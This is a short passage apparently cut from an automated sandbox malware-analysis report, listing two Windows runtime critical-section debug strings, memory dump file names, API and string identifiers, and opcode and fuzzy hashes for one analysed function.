                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038BFE2B
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038BFE01
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                • API String ID: 885266447-3903918235
                                                                • Opcode ID: 5e8f14d8da43387c4cb5d6ff90c7e553bb4221a5b855dbccef74e2af89eb621d
                                                                • Instruction ID: 790aed51b48bd2d47eb4942e0688cd841984e6292450aee6f74a68af17cb735b
                                                                • Opcode Fuzzy Hash: 5e8f14d8da43387c4cb5d6ff90c7e553bb4221a5b855dbccef74e2af89eb621d
                                                                • Instruction Fuzzy Hash: F5F0C836200201BFDA215A89DC01E67BB6ADB45730F140254F624992D1D962B83086A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%